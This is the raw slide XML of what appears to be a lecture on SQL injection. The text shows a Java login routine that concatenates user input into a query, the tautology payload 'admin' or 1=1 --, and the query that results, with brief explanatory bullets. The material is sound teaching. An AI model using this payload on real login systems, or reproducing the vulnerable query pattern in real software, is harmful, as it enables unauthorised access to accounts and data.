            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3134995">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="3134868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55904" y="1480566"/>
            <a:ext cx="8471535" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8471535">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="847115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55904" y="4602479"/>
            <a:ext cx="8471535" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8471535">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="847115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41502" y="1506727"/>
            <a:ext cx="8184515" cy="27082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5265" indent="-202565">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="215900" algn="l"/>
              </a:tabLst>
            </a:pP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String LoginAction (HttpServletRequest request, ...) throws IOException</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC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{</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="367665" indent="-354965">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="367665" algn="l"/>
                <a:tab pos="368300" algn="l"/>
              </a:tabLst>
            </a:pP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String sLogin = getParam (request,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC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"Login");</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="367665" indent="-354965">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="367665" algn="l"/>
                <a:tab pos="368300" algn="l"/>
              </a:tabLst>
            </a:pP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String sPassword = getParam (request,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC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"Password");</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="367665" indent="-354965">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="367665" algn="l"/>
                <a:tab pos="368300" algn="l"/>
              </a:tabLst>
            </a:pP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java.sql.ResultSet rs =</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC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null;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="367665" indent="-354965">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="367665" algn="l"/>
                <a:tab pos="368300" algn="l"/>
              </a:tabLst>
            </a:pP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String qry = "select member_id, member_level from members where</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC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";</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="366395" indent="-353695">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="366395" algn="l"/>
                <a:tab pos="367030" algn="l"/>
              </a:tabLst>
            </a:pP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qry = qry + “member_login =’” + </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sLogin </a:t>
            </a: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+ “’ and member_password =’” + </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sPassword </a:t>
            </a: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+</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-275" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC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“’”;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="367665" indent="-354965">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="367665" algn="l"/>
                <a:tab pos="368300" algn="l"/>
              </a:tabLst>
            </a:pP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java.sql.ResultSet rs = stat.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC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(qry);</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="368935" indent="-356235">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="368935" algn="l"/>
                <a:tab pos="369570" algn="l"/>
              </a:tabLst>
            </a:pP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if (rs.next ()) { // Login and password</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC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passed</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="672465" indent="-659765">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="672465" algn="l"/>
                <a:tab pos="673100" algn="l"/>
              </a:tabLst>
            </a:pP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session.setAttribute ("UserID",</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC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rs.getString(1));</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="673100">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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…</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="368300">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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}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561335" y="4261358"/>
            <a:ext cx="152844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admin’ or 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-2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Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>--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002016" y="4217169"/>
            <a:ext cx="5334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FF3300"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>blank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390900" y="2932176"/>
            <a:ext cx="881380" cy="1335405"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="881379" h="1335404">
                <a:moveTo>
                  <a:pt x="38259" y="1268725"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10667" y="1250442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1335024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31241" y="1316987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31241" y="1279398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38259" y="1268725"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="881379" h="1335404">
                <a:moveTo>
                  <a:pt x="46014" y="1273864"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="38259" y="1268725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31241" y="1279398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38861" y="1284732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46014" y="1273864"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="881379" h="1335404">
                <a:moveTo>
                  <a:pt x="73913" y="1292352"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="46014" y="1273864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38861" y="1284732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31241" y="1279398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31241" y="1316987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73913" y="1292352"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="881379" h="1335404">
                <a:moveTo>
                  <a:pt x="880871" y="5334"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="872489" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38259" y="1268725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46014" y="1273864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="880871" y="53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844028" y="2971038"/>
            <a:ext cx="380365" cy="1296670"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="380365" h="1296670">
                <a:moveTo>
                  <a:pt x="348699" y="1221645"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9144" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339409" y="1224161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="348699" y="1221645"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="380365" h="1296670">
                <a:moveTo>
                  <a:pt x="352044" y="1282669"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="352044" y="1233678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="342900" y="1236726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339409" y="1224161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="307086" y="1232916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="352044" y="1282669"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="380365" h="1296670">
                <a:moveTo>
                  <a:pt x="352044" y="1233678"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="348699" y="1221645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339409" y="1224161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="342900" y="1236726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="352044" y="1233678"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="380365" h="1296670">
                <a:moveTo>
                  <a:pt x="380238" y="1213104"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="348699" y="1221645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="352044" y="1233678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="352044" y="1282669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364236" y="1296162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="380238" y="12131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762500" y="5257800"/>
            <a:ext cx="76200" cy="381000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="76200" h="381000">
                <a:moveTo>
                  <a:pt x="76200" y="304800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="304800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33528" y="371856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33528" y="317753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43434" y="317753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43434" y="370331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76200" y="304800"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="76200" h="381000">
                <a:moveTo>
                  <a:pt x="43434" y="304800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="43434" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33528" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33528" y="304800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43434" y="304800"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="76200" h="381000">
                <a:moveTo>
                  <a:pt x="43434" y="370331"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="43434" y="317753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33528" y="317753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33528" y="371856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38100" y="381000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43434" y="37033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239000" y="1447800"/>
            <a:ext cx="2048255" cy="119100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343400" y="1824989"/>
            <a:ext cx="2898140" cy="1042669"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2898140" h="1042669">
                <a:moveTo>
                  <a:pt x="70531" y="1002392"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="59436" y="970788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1031748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58674" y="1039148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58674" y="1006602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70531" y="1002392"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2898140" h="1042669">
                <a:moveTo>
                  <a:pt x="73485" y="1010808"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="70531" y="1002392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58674" y="1006602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61721" y="1014984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73485" y="1010808"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2898140" h="1042669">
                <a:moveTo>
                  <a:pt x="84581" y="1042416"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="73485" y="1010808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61721" y="1014984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58674" y="1006602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58674" y="1039148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84581" y="1042416"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2898140" h="1042669">
                <a:moveTo>
                  <a:pt x="2897886" y="8381"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2894076" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70531" y="1002392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73485" y="1010808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2897886" y="838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691628" y="2209038"/>
            <a:ext cx="176530" cy="610870"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="176529" h="610869">
                <a:moveTo>
                  <a:pt x="143282" y="535741"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9905" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134139" y="538098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143282" y="535741"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="176529" h="610869">
                <a:moveTo>
                  <a:pt x="146303" y="597916"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="146303" y="547878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137159" y="550164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134139" y="538098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102107" y="546354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146303" y="597916"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="176529" h="610869">
                <a:moveTo>
                  <a:pt x="146303" y="547878"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="143282" y="535741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134139" y="538098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137159" y="550164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146303" y="547878"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="176529" h="610869">
                <a:moveTo>
                  <a:pt x="176021" y="527304"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="143282" y="535741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146303" y="547878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146303" y="597916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156971" y="610362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176021" y="52730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762500" y="5943600"/>
            <a:ext cx="76200" cy="381000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="76200" h="381000">
                <a:moveTo>
                  <a:pt x="76200" y="304800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="304800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33528" y="371856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33528" y="317753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43434" y="317753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43434" y="370331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76200" y="304800"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="76200" h="381000">
                <a:moveTo>
                  <a:pt x="43434" y="304800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="43434" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33528" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33528" y="304800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43434" y="304800"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="76200" h="381000">
                <a:moveTo>
                  <a:pt x="43434" y="370331"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="43434" y="317753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33528" y="317753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33528" y="371856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38100" y="381000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43434" y="37033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917702" y="4676647"/>
            <a:ext cx="7054215" cy="1930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89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solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>select member_id, member_level from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC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0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>members</a:t>
            </a:r>
            <a:endParaRPr sz="200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</a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>where member_login =’admin’ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>or 1=1 --</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>’ and member_password</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-55" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>=’’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-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Tautology </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>attack (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any condition or true =</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000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true</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>)</a:t>
            </a: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-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>select member_id, member_level from members where</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman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Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>true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22</a:t>
            </a:fld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683761" y="514604"/>
            <a:ext cx="24644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/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-95" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr sz="360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23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93902" y="1451863"/>
            <a:ext cx="7863205" cy="41478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6385" marR="5080" indent="-273685">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0B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2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-6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queries</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-4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that</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-100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are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-90" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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dynamically</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-7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15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>generated</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-4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with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-70" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia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supplied</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="2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inputs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-3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20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>may  get </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>their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intended structures</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-27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altered</a:t>
            </a:r>
            <a:endParaRPr sz="20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450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1800" spc="0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Lack </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-12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validation</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="286385" indent="-273685">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1275"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0B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Reported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as #2 vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>OWASP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in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-24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2010</a:t>
            </a:r>
            <a:endParaRPr sz="20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0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2900">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="286385" indent="-273685">
              <a:lnSpc>
